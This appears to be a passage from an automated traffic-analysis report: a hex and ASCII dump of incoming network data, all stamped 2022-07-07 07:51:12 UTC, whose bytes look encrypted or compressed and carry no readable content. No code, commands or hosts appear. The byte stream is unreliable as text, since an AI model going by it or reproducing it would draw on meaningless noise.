                                                                                                                                                            2022-07-07 07:51:12 UTC3638INData Raw: 0c b3 3f c1 fa 9e 0f 62 1e 63 0e fd c9 a8 38 5e 68 6e 19 b3 57 4f f4 9b 9a bd 09 fb 9b 1b 79 09 bd 22 45 1b b7 af 8c d2 70 a6 98 3b 5e 76 65 af 3e cc 97 a8 40 aa f7 d3 e1 5a 9a 10 c2 d0 f1 24 7e a2 e0 c1 9c c9 c7 0e fd c1 e2 84 63 72 d8 9d 98 92 73 52 1c 3e d3 d6 57 37 de 81 53 29 27 e6 7b e5 3e b6 3c c6 fe 85 a4 dd ef dd 28 2c 41 78 84 49 26 37 ac a9 ae 9c fc c7 83 72 af a5 91 78 94 f7 f0 0a 82 41 f2 c8 bd b2 6d 23 a8 cc 98 2c 3e f0 da 6b d9 cc b3 2c 79 43 e6 0e 40 37 1a 72 f8 98 68 ee 90 a3 6b ac 3d 3f d1 68 fc 57 20 0e a6 ff ba 50 be f4 a6 03 5d 5d 55 32 2d 74 20 66 a9 af 4f 92 72 73 b2 4c 54 79 40 21 28 2c 3c 80 eb 9b bd 04 99 d1 45 57 5e e2 40 7b 28 14 12 29 6d d3 d5 af 79 52 05 f7 3d f1 20 1d d5 ad 73 19 50 8c af aa 1f ca 6f d6 5c f5 ea 98 be b5 8c
                                                                                                                                                            Data Ascii: ?bc8^hnWOy"Ep;^ve>@Z$~crsR>W7S)'{><(,AxI&7rxAm#,>k,yC@7rhk=?hW P]]U2-t fOrsLTy@!(,<EW^@{()myR= sPo\
                                                                                                                                                            2022-07-07 07:51:12 UTC3654INData Raw: a5 a3 f2 3b 2c c9 e5 8f 74 33 95 1e 48 ef d3 83 f3 8f a5 07 e9 2a 23 a8 1f ae 12 06 74 56 94 a2 fb bb 0c 3b 06 e0 53 ee ab 83 0f f7 be 77 63 b1 23 74 af b0 70 73 14 b6 aa d2 c6 e9 ee 46 c8 fc 2c 9f 42 7e 06 58 de d8 71 28 06 f1 35 9f 5e d2 e6 a0 68 01 52 8a 6a 04 40 88 b7 cb 67 fa a1 f9 26 fc 76 63 12 5b 45 7b 90 03 91 e2 c0 17 e9 73 07 10 1f 35 e0 23 de 82 08 da 80 62 0c 5c a3 0d e0 bf 08 cd 1f 44 91 96 0a 83 00 8a cb cc bb 23 30 27 82 04 f1 7f 75 5e ad 7c e7 18 18 dc ca a0 81 da b2 78 28 a1 8d 10 11 52 87 fc c8 84 27 c2 5b 81 51 28 16 bc 3a cd 8f 8d ce 90 4f 77 fa 9c 20 d5 b2 db 2a ab 87 3b 2e f3 ce fd 37 7e 76 08 17 d7 c7 d1 4b cd 77 67 ee 7a 07 10 a7 8d 9e 1a fa 48 20 3d 43 a4 e1 3a 71 dc 22 8f 3a cc 5e 56 f5 77 98 5b c0 41 6e 63 6b bc fa 00 a7 0d 26
                                                                                                                                                            Data Ascii: ;,t3H*#tV;Swc#tpsF,B~Xq(5^hRj@g&vc[E{s5#b\D#0'u^|x(R'[Q(:Ow *;.7~vKwgzH =C:q":^Vw[Anck&
                                                                                                                                                            2022-07-07 07:51:12 UTC3670INData Raw: 37 16 4e 94 40 73 8f 5a 22 34 14 a1 6b 1c cd 20 bc 7b 8e 78 26 c4 37 ed 41 25 50 b7 76 5e dc 36 46 b8 ce 7a f2 d9 61 e3 51 a4 5a 4a f0 6d 3b e3 60 36 77 48 a8 11 fe 1d 70 7e 06 38 71 57 59 14 c2 8d 16 22 cb 9e 6e 73 b1 ac ae f8 f3 dc 6d d7 55 ea c8 ca d3 88 3f 6c be 70 3e 39 f3 4f 0a 68 74 e6 a9 1c 1b 27 1a e2 1b ed 9e 7b d0 63 5a 40 6a 58 a1 a2 fe b7 73 75 83 3b 0b 3f bf e0 16 61 b0 64 aa 0d 70 b1 60 12 01 a7 c6 6b 8c f3 84 fe 6d 8d 8a d3 ba 14 f9 aa 33 f1 09 ec 76 82 ea 1d 69 8e 6e ce 97 fc ad 0f 5f 23 29 ac cb 7e 65 c4 62 0c 34 2f bf b2 f0 f0 4e e7 db 70 0c 6a f2 d2 95 a8 01 b3 7f eb 54 0e 0c b2 6b da 53 3a d0 4a b7 c9 35 8a 93 65 4a 89 f8 a7 26 eb 68 a3 28 7c 8b 13 40 e6 dc c2 c0 77 7e af 40 4b 1c 48 77 38 38 c4 34 23 b5 f0 75 5b bc 06 4e 3a 28 3e 5b
                                                                                                                                                            Data Ascii: 7N@sZ"4k {x&7A%Pv^6FzaQZJm;`6wHp~8qWY"nsmU?lp>9Oht'{cZ@jXsu;?adp`km3vin_#)~eb4/NpjTkS:J5eJ&h(|@w~@KHw884#u[N:(>[
                                                                                                                                                            2022-07-07 07:51:12 UTC3686INData Raw: 7a 7b d8 ef 14 71 85 a3 34 4a cf 14 fc 4b 9e c3 2e 3a b6 66 fd fc 72 f2 b9 de ee 1f c6 67 54 63 08 bf fa 53 8b 7c a9 f9 5a ff 65 e0 4b 54 ed 3b dc a6 61 9d 5c 4a 82 b3 33 63 55 bb 3c 29 69 25 ed 0d 3e 60 f2 ac 88 ea 1f f2 1e ca 2b 79 9e a3 6a 1a 16 7a 84 8f e9 91 e9 e2 68 fb fd 77 77 55 68 90 1b 16 1b b8 67 03 21 ab fc 8d a4 ba 95 df 90 51 c2 60 90 45 32 4e 8e 5a 75 58 5b 1d e3 27 52 62 d4 17 f5 b9 e6 e7 5a e1 5e b4 65 b2 46 78 be 1a b1 cd 88 3b 0a df 38 37 4e cd 51 3f 05 ac c3 b4 d3 83 9f 8d 22 a6 b0 cd 03 b3 9d bd 68 64 04 55 1a b9 e2 c5 f3 6d 1a 5a b3 4b 0d 3f b0 79 24 37 b3 fc d6 f4 2b f9 0f d0 07 0a 24 9c eb c6 2a 7c 8b 9d e8 4b 57 bd d2 19 f0 db c2 ac 23 15 01 de a3 fa 76 07 f4 7f 1c b6 51 28 29 28 59 3a ec f4 37 c5 e7 84 67 0d 58 a7 f7 a7 68 82 17
                                                                                                                                                            Data Ascii: z{q4JK.:frgTcS|ZeKT;a\J3cU<)i%>`+yjzhwwUhg!Q`E2NZuX['RbZ^eFx;87NQ?"hdUmZK?y$7+$*|KW#vQ()(Y:7gXh
                                                                                                                                                            2022-07-07 07:51:12 UTC3702INData Raw: 14 60 b6 f8 3d ef e4 87 13 39 17 45 16 f4 9a 7b bd 84 22 01 30 79 ae 55 7e 10 81 99 d1 00 8d d4 25 e3 fd d0 2b 04 ad 85 67 7a 20 be 76 1b 55 58 a9 08 19 fb 91 13 c5 95 03 3f 26 22 bf 53 04 11 65 cb 2d 65 ee 87 fb 73 30 9d 41 10 b2 cb f5 21 db 3c bc 78 c3 e5 00 94 3d 7c 2a 58 fa bd a8 d6 e4 14 ba f8 e2 05 19 0b c9 79 e9 a6 b4 cc 7c 5e 35 6e 69 d5 1c 3f 65 2d 16 d1 ff 56 fe 4e 4d e8 66 c5 b4 2c 4e 2e 85 85 34 4e d4 e0 e7 ea 80 e6 c4 c1 f6 c0 e4 f9 b5 fc 37 8f e6 f8 d0 7f ef 37 c8 da b3 3c bf 29 eb 7e b4 09 20 c1 ba 7f a5 0d d7 73 18 75 98 21 a0 11 27 89 59 85 6c 21 21 1c 3c 5f 6d c9 f0 f7 17 55 17 46 9c 09 14 9c d3 22 d7 56 ec b2 a5 c0 ed fa ff a6 6e 00 4e 16 e4 62 cf 35 fa 10 11 6d 6b 9d 21 b3 8c 93 ab 8b c7 c0 30 97 a3 7b 3c 62 5b d2 5b 34 00 b8 c4 b0 a4
                                                                                                                                                            Data Ascii: `=9E{"0yU~%+gz vUX?&"Se-es0A!<x=|*Xy|^5ni?e-VNMf,N.4N77<)~ su!'Yl!!<_mUF"VnNb5mk!0{<b[[4
                                                                                                                                                            2022-07-07 07:51:12 UTC3718INData Raw: 7d fa 1e 64 d5 7d ca 77 9a b5 a7 c6 48 a4 3b 37 6c 21 cc 29 7f 0c 1b 47 50 9d 14 c6 2c 15 35 9a 6a 3c 67 45 aa e6 c0 79 42 8b a3 5d c2 60 6a bc 13 e4 a6 f5 62 6f 19 e7 13 ec 60 bf 29 8f 8b df b6 05 76 9f d1 b5 90 e5 9b 95 ec d6 7a b5 74 06 6b 49 e2 44 20 fe 49 2e 70 b1 c4 f2 7d f2 f2 ef 7d 5c 15 a6 07 e1 de f0 56 74 ef 5a 30 e4 a2 54 83 ea 8e e5 8d 7b 3a f3 b6 88 ec fe 8a 65 20 16 12 fa 38 c3 b1 1d 21 83 98 a7 53 93 52 07 15 6b 83 7c 24 25 4a b3 a4 9c fa 82 31 e0 4b d1 ef 52 65 42 5b 54 7d d2 1c 06 8b e8 82 8e 01 74 e5 cc f1 01 d1 1a a3 2f 6f c3 89 f8 ef 5e cc e7 19 43 49 e1 ce 9d ee 43 bc a8 74 6e cc 1e 56 85 b1 47 0b 98 5c 42 c2 9a d0 a4 54 82 18 26 c6 82 1f 8a 11 eb fc 36 08 3e d8 19 dd a8 1e 65 1e ce 3b 7d ea fd 30 02 59 d3 e1 40 5f a3 64 01 8d 28 c8
                                                                                                                                                            Data Ascii: }d}wH;7l!)GP,5j<gEyB]`jbo`)vztkID I.p}}\VtZ0T{:e 8!SRk|$%J1KReB[T}t/o^CICtnVG\BT&6>e;}0Y@_d(
                                                                                                                                                            2022-07-07 07:51:12 UTC3734INData Raw: a9 4b b4 be 41 7c 7c af 4b ed 42 57 3f 57 01 86 f6 d9 a6 a4 b3 16 ad e7 df 16 3d c7 48 9a 93 06 1a d8 36 45 aa 19 69 80 8e 6f f5 6f 1e 8f da 64 f9 8c 48 fd a0 29 46 3f 34 04 30 94 05 26 1c a9 f2 23 b0 3c 58 78 be ac cc 13 3d fb b6 48 63 6b 06 c5 cc 55 76 73 ec bf 4f 7e ec e5 9a 92 9d a9 6b 07 81 8b 0f a3 57 05 10 c1 20 19 74 14 c7 e3 2b 38 0c da 47 71 bd 56 f4 77 d2 46 22 2f 44 b2 e7 85 6b de 99 e8 af 2c c7 22 fc 11 c3 ba d5 bd 2e cf 6f 47 1d b9 78 fd 7f 34 5b 3a 1d 2b 24 7a d2 ba 1f c4 61 dc 38 7c 71 be 1f fd 32 17 fc 51 27 60 62 b1 59 0e f8 0f 32 5d 32 cb 37 09 6e 07 dd e6 9f d5 1e f3 28 d1 31 18 10 63 ba 3a 3a cd 9a 60 cd a9 4b 20 d5 bc 8b d9 1e c0 a4 e3 f4 f8 bf b1 b5 9d 34 a9 62 f8 bf 50 e1 9a ce c6 30 f3 2f d1 61 e1 8e 71 a2 8d 77 27 16 95 4b 18 ea
                                                                                                                                                            Data Ascii: KA||KBW?W=H6EioodH)F?40&#<Xx=HckUvsO~kW t+8GqVwF"/Dk,".oGx4[:+$za8|q2Q'`bY2]27n(1c::`K 4bP0/aqw'K
                                                                                                                                                            2022-07-07 07:51:12 UTC3750INData Raw: dc ef 33 77 9f 6a f9 c2 9a 1c 88 20 cd 24 df e4 94 aa 8b 5e e8 08 79 00 c2 02 03 03 22 74 9e a9 7b 08 ad 41 90 42 02 28 29 37 05 ab 89 29 b4 32 e4 eb e0 fe 67 7c 69 c1 1b 47 1b 19 d1 5f 7a 7c 3e 1d a4 a3 d9 0f 60 2f 64 61 61 a8 be 19 86 fa 89 3b 3f fb aa 31 a9 08 06 32 ed d2 d1 e4 af 36 fe 55 b6 4c f5 94 81 52 82 bb 8a 1a 13 b6 e9 58 06 91 52 93 26 24 e7 7b ce a7 55 2f 54 45 fe 10 10 d8 28 9f 5b 5f 6d df aa 19 92 43 39 e3 57 4e d0 9e 0d 89 b6 b8 cb d7 6e d8 6d 2b 12 96 81 52 1d c0 50 46 7f 36 b8 97 c1 0e a7 97 be 3a 19 aa 18 58 bd 10 87 6f 7f 9c 93 a1 e2 ee 9b 09 4c a8 28 4e f2 02 08 6d b2 7f 79 d5 3e be c3 8d 0e 88 68 b1 cf 19 12 a8 89 be 8a 35 c8 c5 25 7b be 05 0b b7 ca 13 55 f1 2d a1 05 bb e6 41 f9 db f6 45 2e 26 71 8b cc 25 e4 d1 1a d6 e6 b1 91 f6 27
                                                                                                                                                            Data Ascii: 3wj $^y"t{AB()7)2g|iG_z|>`/daa;?126ULRXR&${U/TE([_mC9WNnm+RPF6:XoL(Nmy>h5%{U-AE.&q%'
                                                                                                                                                            2022-07-07 07:51:12 UTC3766INData Raw: 85 58 fb 4a 91 49 50 54 7f 3f 50 ac e2 fd 78 11 84 c5 e4 ba d1 14 19 ac 32 3c da 03 a0 22 6d f1 ca bf c4 3a 24 da 4a 65 e1 05 3c 67 64 ff 8b 48 ad d6 85 79 30 42 b2 cf aa f4 3a 6a f1 47 4a 76 fb ca 44 0e 19 89 7f ed 71 09 26 c3 e7 4f 73 f5 1d ef 39 a4 fc 9e 58 8c 78 76 89 9a 63 2e b4 10 3f 75 db 6d 0d 67 0e 69 47 66 e3 c6 e1 f9 bd 52 82 77 ec 7b 53 af 02 d3 f4 c4 21 a5 e1 58 64 fe f0 35 22 ff 18 e1 8b c0 5f c8 ec c4 ec 6a 4e 48 5f 2a 61 bd cc a3 0b 85 70 9e 20 b1 f0 d4 f4 5e 7c e9 f0 31 64 2d 30 4d df 22 31 59 21 fa 29 10 46 bf ef a1 e3 b6 1e 49 26 df bb d0 fa e6 7c bf 85 c0 3f 24 a5 84 24 24 20 6e 49 d6 7f 73 0a 2e c6 bd 9a 28 d3 57 ac 8c 72 53 72 1c d6 04 2d 5e e4 f5 99 eb a0 b7 b6 54 b7 dd 63 a9 ec 51 6a 09 fb 0a b3 2e 4c 2a b4 4b 84 bb 56 c4 08 e0 8e
                                                                                                                                                            Data Ascii: XJIPT?Px2<"m:$Je<gdHy0B:jGJvDq&Os9Xxvc.?umgiGfRw{S!Xd5"_jNH_*ap ^|1d-0M"1Y!)FI&|?$$$ nIs.(WrSr-^TcQj.L*KV
                                                                                                                                                            2022-07-07 07:51:12 UTC3782INData Raw: 3e 0b 07 11 6e 93 e5 d3 1a 3e 9b cb 5f 24 28 28 66 94 af ed 39 8a 82 78 bd ec a5 2b 92 80 2b 1c 18 ee 41 2a da 1e 54 d2 46 cd 1a d6 55 00 ae fb cc 4a 92 ab 19 64 a6 6f 69 64 d3 c5 6f b0 e8 f9 70 67 49 70 fa 73 a7 ce 9e 5a fa e8 75 54 ba 14 ff 07 64 5c dd 2e b0 12 f6 dd 48 7e 69 6b e1 16 d8 a3 32 84 8f a9 8b 73 0a f8 92 24 62 fd d7 ac 55 01 19 71 32 e0 e9 85 ab c2 dd 47 46 98 42 97 6b 32 6d e3 34 68 63 67 3f 01 ea a5 7b 32 58 eb c3 e8 b5 71 f1 26 11 e4 6e 16 ff 7a 30 32 0b d8 17 1f da 50 ab e8 4f 95 7e be 09 0a 73 ec 4b 08 5f 5d 29 a7 1b a7 2a 19 93 f1 cb 2c 74 7f a1 ec 97 c6 7a 2f 49 cc 52 25 d2 5e f2 8c 03 12 54 00 79 e4 8e c4 02 db 9a dc 69 c3 2b e3 39 29 35 22 7c bc d7 33 cd d2 32 72 58 65 bb f6 bb ca 33 92 dd 30 60 08 4e 61 5a e5 c6 ad 1c 30 5a 9f 91
                                                                                                                                                            Data Ascii: >n>_$((f9x++A*TFUJdoidopgIpsZuTd\.H~ik2s$bUq2GFBk2m4hcg?{2Xq&nz02PO~sK_])*,tz/IR%^Tyi+9)5"|32rXe30`NaZ0Z
                                                                                                                                                            2022-07-07 07:51:12 UTC3798INData Raw: 7e c2 ca 10 1a b7 cd b2 b4 ee ff 8d ae d6 56 5a cc ba f8 8c 24 28 2f 5e 0d 7b c7 8b c6 b6 f7 85 1b 51 cf 15 05 56 07 c8 39 9b 61 73 a4 e1 4c ec fd 64 dd b1 78 7a da bf a7 14 64 6a a9 28 19 aa de d1 8b a2 6f a6 67 06 a3 30 c0 d8 26 0a bc dc aa 72 a8 f2 d2 ed 8f ad d1 44 50 1a 23 b8 60 8d cf d1 07 70 d9 aa 5c b1 88 98 e1 fe c3 ce 4e 00 58 f8 79 8e f4 c7 fd dc b3 2a dd b4 54 05 21 1d c0 f5 ec 1a 25 0d b7 d2 83 24 09 51 40 f6 ef 17 c0 c0 d8 63 91 33 c5 62 15 d9 0a 05 52 81 6e fa d7 23 4f 21 a2 8d 5e 9c aa 0d 0b 58 81 a1 1c e6 56 fc 49 ca f5 39 4e e5 5a 22 5b e6 30 72 a9 e5 68 23 b8 b3 cc 11 2d 14 3a 30 3d 3c 0f 2a a8 1d d5 08 fc ac 72 35 02 ef d8 b1 dd f3 c2 a3 bc 7c 00 c2 66 bc 4e aa 7a 0b 92 c8 2d db 8a 45 3b 1f 16 b0 14 4b 93 1b f4 f1 f2 c4 1e 37 80 29 1d
                                                                                                                                                            Data Ascii: ~VZ$(/^{QV9asLdxzdj(og0&rDP#`p\NXy*T!%$Q@c3bRn#O!^XVI9NZ"[0rh#-:0=<*r5|fNz-E;K7)
                                                                                                                                                            2022-07-07 07:51:12 UTC3814INData Raw: c9 6f e4 51 53 53 f7 e3 1e 69 d3 18 d9 d8 73 94 f8 ec 17 4c ff 1c 8f 22 41 7e 60 d8 4a 26 22 90 ec de 94 5c 58 23 ee 89 37 15 22 38 49 c5 5c 5d bd 91 61 3e 03 68 6f cb c8 8b 16 be cb 78 63 eb dc 74 b9 ce 7b 5c 0c da 29 e3 7d ff 9b 53 e8 d6 60 da f0 17 d7 56 ab 11 45 a5 3b 1e 5a b1 2b 31 b9 b6 2b fc 15 4b e1 24 c4 26 ed ad 1d b9 7d 19 2f 44 0e 31 01 37 50 95 72 cf d4 11 6c f2 3a 4f 61 0d 4f 80 7a 77 68 f0 af 85 7b 5f 10 0b 01 f8 9a 02 68 e8 30 c1 49 51 13 bd 07 dd 16 e6 ec 65 1e da 82 d2 5c b5 e3 ac 8b fb ec cf 03 e6 7b 95 ae a1 5c 52 65 7c 02 95 f6 73 f4 90 2e 29 76 b7 89 92 6c 01 6f 1f 82 8e 77 6e 8c c8 e2 d6 e0 95 76 0a 30 cf 8c 92 7e 0a 43 36 05 b0 ee 2a 9f 0d a8 bd 17 12 4f 08 d2 e4 95 92 24 44 ac 72 f4 f0 76 97 fd 25 e7 10 8e e9 f8 6a 30 4a 7f c2 83
                                                                                                                                                            Data Ascii: oQSSisL"A~`J&"\X#7"8I\]a>hoxct{\)}S`VE;Z+1+K$&}/D17Prl:OaOzwh{_h0IQe\{\Re|s.)vlownv0~C6*O$Drv%j0J
                                                                                                                                                            2022-07-07 07:51:12 UTC3830INData Raw: f8 56 9c 49 b9 5a db 83 a6 34 df 6f d2 bd b2 72 7d fa 77 6d 9d e9 d7 a4 c8 ed d5 70 b9 a7 d4 5a a4 1b 92 b7 fb 2d 85 dc 99 25 b8 2e de 06 be b1 0c c5 7e fc 5f 63 75 11 13 99 1d b1 26 40 f2 a1 f8 be 3b 59 e0 a9 54 d5 55 dd b2 e5 61 91 03 2c 09 af be a4 94 a2 fd 9b 31 74 50 09 fa 4d e2 34 5e 03 88 9e 76 1f fa 73 d5 c0 d6 94 86 11 3a cd 5d 45 14 f1 00 ae f5 b6 b8 24 f5 ca d4 a2 16 bc e6 07 e3 80 7d bc 08 23 5c e0 ef ad a9 0a 74 30 97 4e a2 9f 4d 92 de 40 05 99 b0 32 a2 d5 67 f1 4a b2 90 73 86 88 8b 36 80 15 65 23 0c 71 1a 08 73 f4 06 07 91 fe 24 98 57 62 25 ca 07 4d f7 79 6e ec 05 ae 2b 76 2a af 1d 6d f0 36 a9 e3 3d 61 2d cb 3b 81 a3 2f 30 65 f8 00 59 42 c4 88 c7 5e 3a 70 d9 ea ca 0d 24 8b b0 13 59 1c 16 c3 f6 13 5f d8 06 3f 19 c9 d1 65 9a 4e 6b 30 d2 b2 c1
                                                                                                                                                            Data Ascii: VIZ4or}wmpZ-%.~_cu&@;YTUa,1tPM4^vs:]E$}#\t0NM@2gJs6e#qs$Wb%Myn+v*m6=a-;/0eYB^:p$Y_?eNk0
                                                                                                                                                            2022-07-07 07:51:12 UTC3846INData Raw: 27 47 1e 06 ee a4 4b fd 2d 53 27 84 2a 53 f1 84 68 8b bf 66 ac 55 54 51 0c 0a 58 08 9b 61 bc be b0 46 53 37 7f 55 8a ec dc f5 04 31 6d 50 79 82 48 fd 7c 3d 2b 27 b8 7f c0 c9 be 03 9b a8 84 78 00 7c b5 96 b9 14 ec 6c 5e 26 cd ae 9a 7e 5e 89 fe d0 b8 df 12 89 1f 36 16 b2 74 e7 68 c7 85 48 11 a3 e2 c8 86 e0 c9 c8 61 21 ab 6c 36 5a 53 47 65 fd 0f 10 d4 94 5d b0 26 03 5f 89 c8 b6 d7 d5 c7 68 9a e7 b9 5b 7d f5 5e 08 2e fc 68 dd 3f 7e 3c 38 2f 0f 62 90 8f 10 34 df c6 b8 51 2d c3 f3 c4 ac a5 ed d1 b1 f1 d1 9b 48 0b 9c 0e 07 33 85 99 84 ab aa ac 35 69 b4 a0 0e f8 33 4b 91 f3 57 ce e6 f8 89 df a8 5c f1 ee 1e 04 e4 4e e0 9f ae 6a eb 9f 32 87 c1 3b b2 30 b5 c9 05 ec 96 4b 1e 65 f4 5f a6 52 a8 c3 e3 af 8a 17 32 32 05 ab 4d 11 44 f4 ba cf 8b 4a 2c a9 5f d2 27 ac 3f 79
                                                                                                                                                            Data Ascii: 'GK-S'*ShfUTQXaFS7U1mPyH|=+'x|l^&~^6thHa!l6ZSGe]&_h[}^.h?~<8/b4Q-H35i3KW\Nj2;0Ke_R22MDJ,_'?y
                                                                                                                                                            2022-07-07 07:51:12 UTC3862INData Raw: 65 8e c7 6c f8 c4 a0 64 20 66 c5 9f 08 28 84 db 72 e7 05 c7 f9 96 d5 40 32 14 fa a3 61 e0 28 6e 73 58 8f 9f 10 c4 1a 81 43 46 28 e0 20 79 c5 f5 1a d2 51 35 be ed fc bf eb 6a 0f 26 04 92 f1 15 70 c1 89 c3 0f 13 42 6e c2 39 1e e8 ae 63 35 b4 10 9b 9b 08 60 df 41 8d ac 05 ca 9e 37 66 6e c7 e2 51 ec 86 e5 01 e8 4a b9 bf 2c 63 cd 04 48 42 8e 86 f6 93 b5 6e 80 eb b8 87 26 6d 4e 5d 9c 79 cd 0c 88 65 24 66 c6 c4 4e cc 46 1c 23 2c 24 95 89 67 1f 2e e4 00 71 f5 10 73 a8 3b 16 fd 3b b1 a1 88 a2 1d 4c 15 9a 94 20 17 b9 a8 80 32 38 87 c7 0a 3e c8 45 cb 27 23 66 80 47 8e 76 6c 84 64 d6 94 65 bf bb 42 96 7a 9c 91 af 76 17 52 82 63 27 0a 0b d9 08 a2 b2 b4 2a 7e d6 f7 4d 94 68 07 43 57 ca c7 5b 22 67 1a bd a1 06 10 66 05 d5 fb 6c 26 60 a4 a9 7b 59 5d b4 16 0f b8 f5 07 c4
                                                                                                                                                            Data Ascii: eld f(r@2a(nsXCF( yQ5j&pBn9c5`A7fnQJ,cHBn&mN]ye$fNF#,$g.qs;;L 28>E'#fGvldeBzvRc'*~MhCW["gfl&`{Y]
                                                                                                                                                            2022-07-07 07:51:12 UTC3878INData Raw: 34 64 04 ca a5 fb f4 93 32 68 cf 98 6a b7 5a fe fe 49 92 23 80 c9 da 9c a4 9f 24 d0 7c 60 57 5d 96 ad 55 ab b4 a8 af 06 8c 75 16 77 81 42 a9 d2 6a 96 f3 5e 77 ed 6a 8d 9f 11 89 9a 3c 0b 3d 33 25 ae 8e 95 ea ca a4 1a 47 b9 85 e2 7c aa 48 85 9d a5 45 51 94 df 0c ef 95 27 31 74 29 6e c7 56 c0 dd 51 94 6d 7d ab 56 6a cf b0 41 81 f5 0d 09 ae 76 99 7d f0 5c 11 29 9b 09 8f 47 6f db 0e 2c 6e bf 06 bb fc 83 fc 52 11 78 f9 13 29 c0 ab 82 02 c0 76 6e 92 d9 fd cf 32 cc 3e 68 60 95 fe 05 5b de 89 e5 57 1c 3c c6 fd 91 30 9f ce 8a 26 b2 bf 02 34 07 df 98 ba 8d 14 ee ac 9a 40 df a6 88 b8 f6 85 d1 9e 41 da f4 d7 ef 04 6c bd 1f 28 ec b3 55 00 2c 80 35 4a 33 76 d4 4d 46 97 cf 65 b0 e1 23 91 60 b8 42 28 2c 01 56 f0 29 72 10 15 77 61 43 03 cf 2c 26 0f 4b 51 f1 78 2b a7 f5 60
                                                                                                                                                            Data Ascii: 4d2hjZI#$|`W]UuwBj^wj<=3%G|HEQ'1t)nVQm}VjAv}\)Go,nRx)vn2>h`[W<0&4@Al(U,5J3vMFe#`B(,V)rwaC,&KQx+`
                                                                                                                                                            2022-07-07 07:51:12 UTC3894INData Raw: 0c 01 2c 15 b3 a5 41 fc 21 f8 c5 d4 70 df 56 0a 1f b0 3d 94 44 89 7c 3d ff b5 85 67 63 dc 4b 54 8c 67 00 9e 15 75 59 6a bc f1 bb 14 60 87 c3 3a 6d 5b e7 ce 36 91 f0 0b ea 41 fd b5 88 1f 38 61 45 74 d2 83 e6 34 2e ad 2a f8 a4 92 c2 c7 ee 80 b3 33 44 33 d6 ae 62 1a 42 b1 a6 65 6b 18 c7 54 d1 6f a8 3b a8 24 6e 2a dd 22 22 b0 d0 e4 2b c1 d8 77 09 7a d7 6d da e8 91 cd 71 85 bf ab 33 0c aa 28 94 7e 67 14 eb 07 5c af 69 e1 13 0b 3f 8a 06 fd c4 87 29 aa c5 41 e9 46 12 84 b0 e3 80 7a da 50 8a 70 d0 68 ec cc 00 98 80 26 fb f8 d1 4f 43 94 ea b0 e4 d7 5f fe d9 b0 78 88 a8 92 62 9c 3c f1 3e 7a 62 6b cb d7 36 fd ed 72 c2 9b f6 a7 a5 46 f3 85 5c f6 3f df b5 22 0a c5 1c 4e a5 1e 92 95 d8 93 29 6f b1 b5 be 25 32 01 51 64 38 cf 3d 0b c2 4d a6 c8 3f 17 81 66 88 93 01 0e c8
                                                                                                                                                            Data Ascii: ,A!pV=D|=gcKTguYj`:m[6A8aEt4.*3D3bBekTo;$n*""+wzmq3(~g\i?)AFzPph&OC_xb<>zbk6rF\?"N)o%2Qd8=M?f
                                                                                                                                                            2022-07-07 07:51:12 UTC3898INData Raw: 90 e1 0a df 80 d4 36 a6 fc 97 83 3e 7e 8a b5 16 c2 b1 31 56 e0 8c 52 3b b8 ec 10 71 26 fd b9 6d 4d 40 b4 41 26 10 c5 13 e0 ab e9 2f 11 ac bd 17 ac 54 05 7a a7 60 23 9b e2 24 2b fe bd 36 31 f3 95 d2 1b af 04 31 94 41 b7 b8 88 72 49 98 22 38 f9 3b 36 48 77 d4 41 99 07 a1 85 d5 8c ec a0 9e b3 7a b6 49 6f 7b 06 2e cc 91 d4 58 0f 9d 86 b2 4a 8f de 1a 3c 35 c0 f8 b6 6e 2b 13 31 b5 62 5f a1 f7 54 8c ef f5 fb a4 b4 9a 62 7f 40 db f0 f7 43 af c4 78 18 26 10 e4 1b fb ab ea f5 8b 81 93 bc b1 f7 91 fc 06 6d a2 e3 30 9c 0e 0e 84 10 8c 37 76 3e 36 5a 4d 91 fb 3d 68 67 5d fd ad f1 2a 15 5e 90 83 9d 5d 3e 53 6d ee ae ad 4a 62 63 fd a1 5e 88 0d b1 b4 0f 3e 8f cb 15 63 a5 e6 ae 7e 21 67 95 da dd 65 fa 40 f2 12 44 f2 5c 5d 66 09 e7 2c b8 1d f7 d8 c7 49 74 c9 6f 04 c4 bb a9
                                                                                                                                                            Data Ascii: 6>~1VR;q&mM@A&/Tz`#$+611ArI"8;6HwAzIo{.XJ<5n+1b_Tb@Cx&m07v>6ZM=hg]*^]>SmJbc^>c~!ge@D\]f,Ito
                                                                                                                                                            2022-07-07 07:51:12 UTC3914INData Raw: 65 2c 8f f6 cc 5e 2f 76 9e a6 fc 17 3e af 99 ee 67 f1 5b e5 aa cc e6 0b 42 71 24 41 62 d3 f9 2d 41 2a 54 77 b2 53 74 8d 15 9a 24 f0 4c 1c 35 8b e4 80 1d ce 7e c4 d1 00 93 93 8b 92 b7 be 63 1b 5b 53 60 df a1 6b b7 ad c2 ab 92 5d 4d 9c a1 90 f2 00 d6 8d 47 9b 45 59 ea 57 23 ac 14 07 87 bf f8 25 93 64 24 f8 83 51 91 8e c2 6b 72 04 6c 97 9f 4b b2 30 17 68 e0 aa 28 0d 59 0f 6d ba 9c 3e 7c 13 6f 65 a5 9d 9a 1b 6f 8a f7 b0 58 3d 6c fa a4 1e 75 8a 7f cd 53 6b 12 d1 f4 48 51 28 98 a3 e3 56 a6 54 02 cb 68 ce 65 66 64 56 89 75 2f cd 6a 76 5e 47 dd 80 65 43 e0 b4 f9 ff 9e 33 07 c4 6c 8b 99 80 b6 db a3 e6 36 ae 5c 9c ab cb 7f cf a7 89 22 7e 7e ac e7 55 e2 72 7d 2c 29 88 8b 7d 6d 0f 51 fc e5 25 86 59 94 3d 40 00 c7 42 9c 65 59 25 b6 47 b8 43 e2 b3 1e 92 53 53 9b 23 b9
                                                                                                                                                            Data Ascii: e,^/v>g[Bq$Ab-A*TwSt$L5~c[S`k]MGEYW#%d$QkrlK0h(Ym>|oeoX=luSkHQ(VThefdVu/jv^GeC3l6\"~~Ur},)}mQ%Y=@BeY%GCSS#
